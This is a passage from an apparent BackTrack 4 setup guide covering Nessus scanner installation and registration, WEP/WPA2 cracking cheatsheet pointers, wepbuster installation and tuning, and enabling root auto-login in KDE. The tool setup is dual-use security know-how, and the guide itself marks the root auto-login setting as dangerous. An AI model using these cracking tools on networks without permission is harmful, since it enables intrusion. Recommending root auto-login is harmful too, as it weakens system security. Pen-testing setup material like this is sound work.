libqt4-script set to manually installed.
libqt4-xml is already the newest version.
libqt4-xml set to manually installed.
libqt4-dbus is already the newest version.
libqt4-dbus set to manually installed.
libqt4-test is already the newest version.
libqt4-test set to manually installed.
libqtgui4 is already the newest version.
libqtgui4 set to manually installed.
libqt4-svg is already the newest version.
libqt4-svg set to manually installed.
libqt4-designer is already the newest version.
libqt4-designer set to manually installed.
libqt4-assistant is already the newest version.
libqt4-assistant set to manually installed.
The following NEW packages will be installed:
  libqt4-core libqt4-gui libqt4-opengl
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 176kB of archives.
After this operation, 762kB of additional disk space will be used.
Get:1 http://archive.offensive-security.com pwnsauce/main libqt4-core 4.4.3-0ubuntu1.2 [7562B]
Get:2 http://archive.offensive-security.com pwnsauce/main libqt4-opengl 4.4.3-0ubuntu1.2 [161kB]
Get:3 http://archive.offensive-security.com pwnsauce/main libqt4-gui 4.4.3-0ubuntu1.2 [7554B]
Fetched 176kB in 1s (114kB/s)
debconf: apt-extracttemplates failed: Bad file descriptor
Selecting previously deselected package libqt4-core.
(Reading database ... 183131 files and directories currently installed.)
Unpacking libqt4-core (from .../libqt4-core_4.4.3-0ubuntu1.2_i386.deb) ...
Selecting previously deselected package libqt4-opengl.
Unpacking libqt4-opengl (from .../libqt4-opengl_4.4.3-0ubuntu1.2_i386.deb) ...
Selecting previously deselected package libqt4-gui.
Unpacking libqt4-gui (from .../libqt4-gui_4.4.3-0ubuntu1.2_i386.deb) ...
Setting up libqt4-core (4.4.3-0ubuntu1.2) ...
Setting up libqt4-opengl (4.4.3-0ubuntu1.2) ...

Setting up libqt4-gui (4.4.3-0ubuntu1.2) ...
Processing triggers for libc6 ...
ldconfig deferred processing now taking place

Now you can install the client :
root@bt4-1:/tmp# dpkg --install NessusClient-4.0.1-ubuntu810_i386.deb
Selecting previously deselected package nessusclient.
(Reading database ... 183150 files and directories currently installed.)
Unpacking nessusclient (from NessusClient-4.0.1-ubuntu810_i386.deb) ...
Setting up nessusclient (4.0.1) ...

Create Certificate
root@bt4-1:/tmp# /opt/nessus/sbin/nessus-mkcert
-------------------------------------------------------------------------------
                        Creation of the Nessus SSL Certificate
-------------------------------------------------------------------------------

This script will now ask you the relevant information to create the SSL
certificate of Nessus. Note that this information will *NOT* be sent to
anybody (everything stays local), but anyone with the ability to connect to your
Nessus daemon will be able to retrieve this information.

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]: BE
Your state or province name [none]: WVL
Your location (e.g. town) [Paris]: Deerlijk
Your organization [Nessus Users United]: Corelan

Congratulations. Your server certificate was properly created.

The following files were created :

. Certification authority :

   Certificate = /opt/nessus//com/nessus/CA/cacert.pem
   Private key = /opt/nessus//var/nessus/CA/cakey.pem

. Nessus Server :
    Certificate = /opt/nessus//com/nessus/CA/servercert.pem
    Private key = /opt/nessus//var/nessus/CA/serverkey.pem
root@bt4-1:/tmp# 



Create a Nessus user:
root@bt4-1:/tmp# /opt/nessus/sbin/nessus-adduser
Login : MyGreatNessusAdminUser
Authentication (pass/cert) : [pass]
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that peter has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
Aborted by end-user.

Register/update plugins
Get yourself a key that will provide access to the free home update feed  : Register a HomeFeed
You will receive an email that contains the feed code.
Install/Register the code with the following command (and update the plugins at the same time) :
root@bt4-1:/tmp# /opt/nessus/bin/nessus-fetch --register PUT-YOUR-CODE-HERE
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.
Verify that “auto_update” in /opt/nessus/etc/nessus/nessusd.conf is set according to the behaviour you want to achieve. If you want to manually update the plugins, you can run :
root@bt4-1:/tmp# /opt/nessus/sbin/nessus-update-plugins
Fetching the newest updates from nessus.org...
Done. The Nessus server will restart when its scans are finished

Make sure Nessus does not start at boot
root@bt4-1:/tmp# update-rc.d -f nessusd remove
 Removing any system startup links for /etc/init.d/nessusd ...
   /etc/rc0.d/K20nessusd
   /etc/rc1.d/K20nessusd
   /etc/rc2.d/S20nessusd
   /etc/rc3.d/S20nessusd
   /etc/rc4.d/S20nessusd
   /etc/rc5.d/S20nessusd
   /etc/rc6.d/K20nessusd

Launch Nessus daemon
root@bt4-1:/tmp# /etc/init.d/nessusd start
Starting Nessus : .
root@bt4-1:/tmp# 

Install additional plugins
http://www.alienvault.com/free_feed_for_nessus.php
Nessus/OpenVAS wrapper for ike-scan

7. Wireless auditing
Crack WEP : Cheatsheet – Cracking WEP with Backtrack 4 and aircrack-ng
Crack WPA2 PSK : Cheatsheet – Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper
Wepbuster : Download from http://code.google.com/p/wepbuster/. Installation procedure (assuming that wepbuster was downloaded into /tmp) :
root@bt:/# cd /tmp
root@bt:/tmp# tar xvfz wepbuster.tgz
wepbuster-1.0_beta/
wepbuster-1.0_beta/README.TXT
wepbuster-1.0_beta/wepbuster
root@bt:/tmp# mv wepbuster-1.0_beta/wepbuster /usr/local/bin
root@bt:/tmp# 


Modify parameters :
edit wepbuster and change the $airodumpwait and $scan_duration parameters (and set them to a value higher than 20):
# Time to wait before reading the airodump output. 23 seconds/sleeps should be safe on default aircrack
-ng installation which updates ]
# .csv files every 20 seconds;
my $airodumpwait = 23 ;

# Initial airodump scan duration (sleeps) when trying to build target AP list
my $scan_duration = 23;

8. Installing/Running in VMWare, but KDE resolution is bad ?

Run “fixvmware”

9. Log on in KDE with root (dangerous ! But if you still want to do it…)

Edit /etc/kde3/kdm/kdmrc  and set the following parameters :
AllowRootLogin=true
AutoLoginEnable=true
AutoLoginUser=root
AutoLoginPass=secret 
Reboot


Enjoy!!!